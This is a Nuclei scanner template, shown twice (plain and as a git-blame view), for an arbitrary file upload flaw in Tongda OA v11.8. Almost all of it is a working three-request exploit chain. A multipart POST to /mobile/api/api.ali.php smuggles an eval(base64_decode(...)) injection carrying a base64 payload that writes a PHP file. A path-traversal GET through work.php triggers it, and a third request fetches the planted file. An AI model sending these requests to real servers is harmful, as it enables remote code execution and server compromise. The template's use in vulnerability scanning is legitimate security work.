nuclei-templates/http/vulnerabilities/tongda/tongda-api-file-upload.yaml

id: tongda-api-file-upload

info:
  name: Tongda OA v11.8 api.ali.php - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    Tongda OA v11.8 api.ali.php has an arbitrary file upload vulnerability. An attacker can upload malicious files to control the server through the vulnerability.
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-oa-api-ali-upload.yaml
  metadata:
    verified: true
    max-request: 3
    fofa-query: app="TDXK-通达OA"
  tags: tongda,oa,fileupload,intrusive

http:
  - raw:
      - |
        POST /mobile/api/api.ali.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=502f67681799b07e5de6b503655f5cae
        Accept-Encoding: gzip

        --502f67681799b07e5de6b503655f5cae
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.json"
        Content-Type: application/octet-stream

        {"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==","dataAnalysis":"{"a":"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*"}"}
        --502f67681799b07e5de6b503655f5cae--
      - |
        GET /inc/package/work.php?id=../../../../../myoa/attach/approve_center/{{trim_prefix(date_time("%Y%M", unix_time()),"20")}}/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
      - |
        GET /{{randstr}}.php  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200'
          - 'contains(body_2,"+OK") && contains(body_3,"phpinfo")'
        condition: and

# digest: 490a0046304402204148abcca82a74ea3d53637117e17bfe199f751e9986158d60fbb7c51d58c9db02206d2f231004a8760cf5afe196fca73844ca526634ca1a000d5727e51866578967:922c64590222798bb761d5b6d8e72950
template update 2023-09-18 12:37:42 +00:00			`id: tongda-api-file-upload`
Added some Templates 2023-08-18 03:22:06 +00:00
			`info:`
Updated 2023-09-08 13:49:09 +00:00			`name: Tongda OA v11.8 api.ali.php - Arbitrary File Upload`
Added some Templates 2023-08-18 03:22:06 +00:00			`author: SleepingBag945`
			`severity: critical`
Updated 2023-09-08 13:49:09 +00:00			`description: \|`
			`Tongda OA v11.8 api.ali.php has an arbitrary file upload vulnerability. An attacker can upload malicious files to control the server through the vulnerability.`
Added some Templates 2023-08-18 03:22:06 +00:00			`reference:`
Updated 2023-09-08 13:49:09 +00:00			`- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-oa-api-ali-upload.yaml`
			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 3`
			`fofa-query: app="TDXK-通达OA"`
			`tags: tongda,oa,fileupload,intrusive`
Added some Templates 2023-08-18 03:22:06 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /mobile/api/api.ali.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=502f67681799b07e5de6b503655f5cae`
			`Accept-Encoding: gzip`

			`--502f67681799b07e5de6b503655f5cae`
Updated 2023-09-08 13:49:09 +00:00			`Content-Disposition: form-data; name="file"; filename="{{randstr}}.json"`
Added some Templates 2023-08-18 03:22:06 +00:00			`Content-Type: application/octet-stream`

			`{"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==","dataAnalysis":"{"a":"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*"}"}`
			`--502f67681799b07e5de6b503655f5cae--`
			`- \|`
			`GET /inc/package/work.php?id=../../../../../myoa/attach/approve_center/{{trim_prefix(date_time("%Y%M", unix_time()),"20")}}/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4 HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
			`- \|`
Updated 2023-09-08 13:49:09 +00:00			`GET /{{randstr}}.php HTTP/1.1`
Added some Templates 2023-08-18 03:22:06 +00:00			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`matchers:`
			`- type: dsl`
			`dsl:`
Updated 2023-09-08 13:49:09 +00:00			`- 'status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200'`
template update 2023-09-18 12:37:42 +00:00			`- 'contains(body_2,"+OK") && contains(body_3,"phpinfo")'`
templateman update 2023-10-14 11:27:55 +00:00			`condition: and`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 490a0046304402204148abcca82a74ea3d53637117e17bfe199f751e9986158d60fbb7c51d58c9db02206d2f231004a8760cf5afe196fca73844ca526634ca1a000d5727e51866578967:922c64590222798bb761d5b6d8e72950`